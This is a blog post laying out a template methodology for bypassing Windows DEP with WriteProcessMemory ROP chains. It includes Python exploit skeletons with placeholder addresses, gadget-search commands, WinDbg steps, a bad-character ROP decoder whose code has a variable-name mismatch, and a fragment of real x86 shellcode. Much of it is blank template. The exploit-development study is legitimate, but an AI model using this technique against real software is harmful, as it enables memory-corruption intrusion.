home..

DEP Bypass using WPM Methodology

Reverse engineering Exploit development Penetration testing DEP Bypass ROP Chains

The below outlines my DEP WriteProcessMemory methodology. Some blanks that can be filled as you work through exercises and exploitation.

1. Program Analysis

Description Analysis
Ports  
Protections  
Input Type  
Base Address  

2. Vuln Discovery

3.1 Vanilla Stack Overflow

| Description | Analysis | | — | — | | Offset overwrite EIP | | | Bad Chats | | | Space After Overwrite | | | DEP | | | ASLRS | | | Codecave | |

3.2 SEH Based Overflow

| Description | Analysis | | — | — | | Offset overwite SEH | | | Modules with SAFESEH | | | Address to P/P/R | | | short jump on NEH: 0x06eb9090  | | | Bad Chars | | | Space after SEH | | | DEP | | | ASLRS | |

4. WriteProcessMemory Recap

This function will allow you to copy your shellcode to another (executable) location so you can jump to it & execute it. During the copy, WPM() will make sure the destination location is marked as writeable. You only have to make sure the target destination is executable. This function requires six parameters on the stack :

return address Address where WriteProcessMemory() needs to return to after it finished
hProcess the handle of the current process. Should be -1 to point to the current process (Static value 0xFFFFFFFF)
lpBaseAddress pointer to the location where your shellcode needs to be written to. The “return address” and “lpBaseAddress” will be the same.
lpBuffer based address of your shellcode (dynamically generated, address on the stack)
nSize number of bytes that need to be copied to the destination location
lpNumberOfBytesWritten writeable location, where number of bytes will be written to
		# BOOL WriteProcessMemory(
    #   HANDLE  hProcess,
    #   LPVOID  lpBaseAddress,
    #   LPCVOID lpBuffer,
    #   SIZE_T  nSize,
    #   SIZE_T  *lpNumberOfBytesWritten
    # );
    #

    va  = pack("<L", (0x41414141))  # WriteProcessMemory address
    va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
    va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
    va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
    va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
    va += pack("<L", (0x46464646))  # nSize (size of shellcode)
    va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)

5. Payload Update and Gadget Searching

We update our payload to incorporate our ROP gadgets and buffer that we will be using. We update our payload as follows:


## Bad chars: 
## EIP Overwrite Address:
## DLLBase Address: 
## EIP Overwrite Size:

 
###################
## WPM STRUCTURE ##
###################
		# BOOL WriteProcessMemory(
    #   HANDLE  hProcess,
    #   LPVOID  lpBaseAddress,
    #   LPCVOID lpBuffer,
    #   SIZE_T  nSize,
    #   SIZE_T  *lpNumberOfBytesWritten
    # );
   
va  = pack("<L", (0x41414141))  # WriteProcessMemory address
va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
va += pack("<L", (0x46464646))  # nSize (size of shellcode)
va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)

###################
##    OVERFLOW   ##
###################
# Offset until EIP overflow
offset = b"A" * (0 - len(va))

###################
## EIP Overwrite ##
###################
#W e ocontrol EIP overwrite  
eip = pack("<L", (0x90909090)) #  DESCRIPTION

###################
##  ROP Gadgets  ##
###################
rop = pack("<L", (0x90909090)) #  DESCRIPTION
rop += pack("<L", (0x90909090)) #  DESCRIPTION

#####################
## NOP & Shellcode ##
#####################
# NOP Padding before shellcode, adjust as needed
rop += b"\x90" * (000 - len(offset) - len(eip))

#Shellcode placeholder at around 450 bytes size
shellc = b"\xCC" * 450

inputbuffer = offset + va + eip + rop + shellc

print("Sending evil buffer...")
print("Shellcode size " + str(len(shellc)))
print("Offset size " + str(len(offset)))
print("VA size " + str(len(va)))
print("Offset to EIP " + str(len(va)+len(offset)+len(shellc)))
print("ROP size " + str(len(rop)))

We will now use RP++ and a custom built power-shell script to generate and sort gadgets that we can utilise.

.\rp-win-x86.exe -f C:\Users\initroot\xxxx -r 3 > gadgets.txt

gci .\gadgets  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(mov e[a-z][a-z], esp).*?((retn  ;)|(ret  ;))"  | Select-String -Pattern "(leave)" -NotMatch

We also make use of an power-shell gci function to manually sort and filter our gadgets. For now we build a quick table that allows us to do simple things like copy between etc.

We analyse our ROP gadgets to setup backup and restore gadgets that can be used during the exploit process.

Gadget Location From To Gadget Ins.
       
       
       
       
       
       
       
       
       
       
       
       
       
       

6. Stack Prep

We need to find the stack address of our current dummy registers, this can be done by using the value in ESP. We can’t modify ESP as it will point to the next gadget, however, we can copy it to another register. The following ways can be used to obtain a copy of the ESP register. Important to ensure we are carried towards our next ROP chain values else execution will not continue.

mov XXX, XXX; ret
xchg XXX, XXX; ret
pop XXX; mov XXX, XXX; ret
lea XXX, [XXX]; ret

We look for gadgets, we rely on a mix of our sorted ROP gadget output file and performing manual searching using gci command pointed to our ROPS folder. In the below example, we look for PUSH ESP gadgets. As a reminder our bad chars are: XXXXX.


We update our payload as follow:


The above will do the following:

Now we need to resolve our WriteProcessMemory address dynamically.

7. Resolving WPM Address

We need to obtain the location of our WriteProcessMemory from the Import Address Table (IAT) table. The Import Address Table (IAT) is a crucial part of the Windows Portable Executable (PE) format used to manage dynamic linking of libraries. When a program calls a function from a dynamically linked library, it references the function’s entry in the IAT.

Considering we cannot copy the executable we will be using WinDBG to obtain the address.

  1. List loaded modules and note their base address lm.

        
    
  2. Dump the header from the dll your interested in !dh <module> –f.

        
    
  3. From the output from !dh look for the the “Import Address Table Directory”.

        
    
  4. Use the d command to dump the address at that offset and try to resolve them to symbols e.g. dps 00000000+X000

        
    

From the above we can identify that our WriteProcessMemoryStub is located at: XXXXXX. Now we need to do the following.

dds XXXXXX

We update our payload and set everything to identify if our dummy addresses are pushes correctly before we proceed.


As we are pushing 0x45454545 onto the stack as a dummy value, we want to identify where on the stack our dummy address is as shown below. We step through the instructions until the very last chain event and then calculate the offset.


? eax - XXXXX  

dd XXXXX  

From the above we learn that we need to move 0xXX bytes from ESP e.g. ESP - 0xXX to reach our WriteProcessMemory dummy Address. Because we control ESP, we looking at where our example landed. Since we have a copy of the original ESP in the EAX register, we need to make some adjustments to move backwards from ESP. We ideally need gadgets like:

SUB EAX, XXXXXX
RETN

Since we can’t find the gadget, we have reached a pitfall and need to get a bit more creative.

gci .\gadgets  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(sub eax).*?((retn  ;)|(ret  ;))"
###no results###

Excellent, XXX register points to our WPM prototype and our first address resolves the WPM memory location successfully. We have successfully patched the address of WriteProcessMemory at runtime. Before we proceed further we ensure we make a copy of our ESP into another register.

8. Patching WPM Parameters

Codecave Hunting

Let’s recap our overall exploit structure, we will need to copy our shellcode to the codecave.

[offset] —> [writeprocessmemory] —> [eip] —> [rop] —> [shellcode]

We now need to patch in the address where WriteProcessMemory() needs to return to after it finished. Before we can proceed we need to identify the codecave where we can copy our shellcode to. The requirements would be that we should utilise a memory location with Execute permissions. We first check the location where our shellcode is currently residing in. We will also need to dynamically resolve the address and can potentially utilise a pivot to jump to our shellcode.


0:004> !dh processname

SECTION HEADER #1
   .text name
    **1E39 virtual size
    1000 virtual address**
    2000 size of raw data

0:004> dd processname + **virtualSize** + virtualAddress 

0:004> !vprot address
AllocationProtect: 00000080  PAGE_EXECUTE_WRITECOPY
RegionSize:        00001000
State:             00001000  MEM_COMMIT
Protect:           00000020  PAGE_EXECUTE_READ
Type:              01000000  MEM_IMAGE

Perfect it seems we have found a spot for our shellcode in the .text section with EXECUTE permissions. Further calculations show we have around XXX bytes for our shellcode. We therefor proceed with our shellcode location as XXXX.

Shellcode Return Address

Now that we have our shellcode location, we can proceed in writing the location into the dummy address. We update our WPM as follows:

va  = pack("<L", (0x41414141))  # WriteProcessMemory address
va += pack("<L", (0x42424242))  # shellcode return address to return to after WriteProcessMemory is called
va += pack("<L", (0xffffffff))  # hProcess (pseudo Process handle)
va += pack("<L", (0x44444444))  # lpBaseAddress (Code cave address)
va += pack("<L", (0x45454545))  # lpBuffer (shellcode address)
va += pack("<L", (0x46464646))  # nSize (size of shellcode)
va += pack("<L", (0x47474747))  # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)

hProcess

We don’t have to do much for the hProcess as the parameter should point to the current process, which in our instance would then be 0xFFFFFFFF which we already hardcoded. The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, [GetCurrentProcess()](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess) returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

#WriteProcessMemory 
va  = pack("<L", (0x45454545)) # dummy WriteProcessMemory Address
va += pack("<L", (0x42424242)) # Shellcode Return Address 0x42424242 where our codecave in the .text area exist
**va += pack("<L", (0xFFFFFFFF)) # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)**
va += pack("<L", (0x44444444)) # lpBaseAddress Code cave address 0x44444444 where our codecave in the .text area exist
va += pack("<L", (0x49494949)) # # dummy lpBuffer (stack address)
va += pack("<L", (0x51515151)) # dummy nSize
va += pack("<L", (0x41414141)) # lpNumberOfBytesWritten

lpBaseAddress

The lpBaseAddress should be equal to our shellcode address e.g. codecave. We update our WPM structure as follow replacing the 0x44444444 with 0xxxxxxxxx.

#WriteProcessMemory 
va  = pack("<L", (0x45454545)) # dummy WriteProcessMemory Address
va += pack("<L", (0x42424242)) # Shellcode Return Address 0x42424242 where our codecave in the .text area exist
va += pack("<L", (0xFFFFFFFF)) # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
**va += pack("<L", (**0x44444444**)) # lpBaseAddress Code cave address** 0x44444444 **where our codecave in the .text area exist**
va += pack("<L", (0x49494949)) # # dummy lpBuffer (stack address)
va += pack("<L", (0x51515151)) # dummy nSize
va += pack("<L", (0x41414141)) # lpNumberOfBytesWritten

lpBuffer

The lpBuffer will be a pointer to our shellcode (**************which first needs to be written to the stack**************). We will resolve this dynamically with ROP gadgets. Let’s dive in. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else.

Since we have control of the stack, we will just preemptively place our shellcode there. Let’s recap which values we have in the registers.


We will need to extract the value the memory address pointing to by using an arbitrary write primitive. When we get the address of the lpBuffer into a register, we will then not overwrite the register but rather utilise something like dword ptr [reg] which will force the address onto the stack to point to something like 0x49494949. Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.


We see that everything works as expected and we successfully have our lpBuffer written.

nSize

Next up we have the nSize value. The value should be the number of bytes written e.g. size of the shellcode + NOPs in most instances. For this specifically we would like to utilise at least 0x180 bytes (384 decimal). For this we continue with our shellcode where we increase the X register to align with the buffer location WriteProcessMemory.


lpNumberOfBytesWritten

We don’t require to use the gadget so we just simply zero it out. lpNumberOfBytesWritten is an optional argument that can be set to null. You could provide a pointer to a variable that will receive the number of bytes transferred by WPM but this is not needed here.


Perfect we have successfully written all the parameters for WPM, and next we need to call kernel32!WriteProcessMemory.

9. Executing WPM

We should now execute our WPM as the stack has been successfully setup. By now we should be 0x20 bytes away from our WPM Prototype’s first parameter which points to kernel32!WriteProcessMemory. We search for gadgets that will decrease the registers we control.


We adjust our exploit as follows:


A final check before we attempt to execute WPM is to check if our lpBuffer is correctly sized still given the changes in our ROP exploit. We check that our WPM is invoked and that the parameters are setup correctly. We set a breakpoint and once WPM is started we check ESP.

0:004> p
KERNEL32!WriteProcessMemoryStub:
XXXXXXXX 8bff            mov     edi,edi
0:004> dds esp 

Next we check if the shellcode is copied, so we dump the contents of our codecave before and after execution.

u XXXXXX

Our parameters seem to have been set correctly and we continue execution to confirm that our shellcode is copied. Keep in mind that our shellcode is currently represented by the 0xcc instructions. The following checks are per- formed:

If we experience issues with the shellcode being mangled, this is usually due to the space between WPM (VA) and our shellcode.

10. Shellcode Execution with WPM

As the content of value needs to be popped into BL AL BH, it should be left-shifted by 8 bits. This action results in a value that aligns with the AL BH register but also includes NULL bytes. To counteract the NULL byte issue, we’ll carry out an OR operation with a static value of 0x11110011. Ultimately, this outcome is inscribed into the ROP chain where it will be popped into another register during execution.
This intricate procedure facilitates custom encoding. Moreover, it enables us to decode the shellcode prior to its transfer to the non-writable code cave.

```python
# AL register = 0x11111100 (value = value | 0x11110011)
# BH register = 0x11110011 (value = (value << 8) | 0x11110011)

def decodeShellcode(badIndex, shellcode):
    badchars = bytearray(b"\x00\x20")
    addencodedchars = bytearray(b"\x01\x01")
    restoreRop = b""
    for i in range(len(badIndex)):
        if i == 0:
            offset = badIndex[i]
        else:
            offset = badIndex[i] - badIndex[i-1]
        neg_offset = (-offset) & 0xffffffff

        value = None
        for j in range(len(badchars)):
            if shellcode[badIndex[i]] == badchars[j]:
                value = encodedchars[j]
                value = (value << 8) | 0x11110011

        restoreRop += pack("<L", (0xFFFFFFFF)) # POP VALUE
        restoreRop += pack("<L", (neg_offset)) # offset to the next bad char
        restoreRop += pack("<L", (0xFFFFFFFF)) # SUB OFFSET
        restoreRop += pack("<L", (0xFFFFFFFF)) # POP VALUE
        restoreRop += pack("<L", (value)) # values in AL
        restoreRop += pack("<L", (0xFFFFFFFF)) # add byte [ecx], al ; ret ;

    return restoreRop
```

Given that a pointer to the shellcode located on the stack is necessary for its modification (or decoding), the optimal position to install the decoding process would be subsequent to the alteration of the `lpBuffer` argument. We will need to continue adjusting our offset for our shellcode set during `LPBUFFER` as our ROP changes to ensure we land within our NOP slides. 

```python
[....]

########### ROP ENCODER ###########
## Bad chars:  \0x00\x0d\x20\x2b\x3d\x5e
shellc = b"\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06\x5e\x89\x75\x04\xeb\x54\xe"

pos = mapBadChars(shellc)
rop += decodeShellcode(pos, shellc)

#Restore WPM prototype buffer for nSize patching

## NSIZE
#adjust eax to align with nsize e.g. increase eax 0x04
rop += pack("<L", (0xFFFFFFFF)) # inc eax ; ret  ; 
rop += pack("<L", (0xFFFFFFFF)) # inc eax ; ret  ;
[....]

#####################
## NOP & Shellcode ##
#####################
# NOP Padding before shellcode, adjust as needed
encodedShellcode = encode(shellcode)
[....]
```

Before we identify potential ROP gadgets for the decoding process, we recap our register values where our ROP Encoder are set to start.

```python

```

| Register | Value | Description |
| --- | --- | --- |
| EAX |  |  |
| EBX |  |  |
| ECX |  |  |
| EDX |  |  |
| ESI |  |  |
| EDI |  |  |
| EBP |  |  |

We effectively need to do the following now:

- XXX points to our shellcode location
- pop the offset of our current or next bad char into a register
- subtract the negative offset
- pop the value for our OR instruction into register
- add lower sub register to our bad char

```python

```

```python

gci .\rops\  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(add byte).*?((retn  ;)|(ret  ;))"

gci .\rops\  -File -Recurse -EA SilentlyContinue | Select-String -Pattern "(sub).*?((retn  ;)|(ret  ;))"

```

We update our shellcode as shown below. Next we step through the instructions to see if our encoder works.

```python
	  
```

Next we need to restore our registers once our ROP decoder is completed. The address for WPM is currently within `ESI`.

```python

```

We run our payload as next we need to adjust our `lpBuffer` again by searching for our NOP slide then calculating the difference.

```bash

```
© 2023 Frans Botes   •  Powered by Soopr   •  Theme  Moonwalk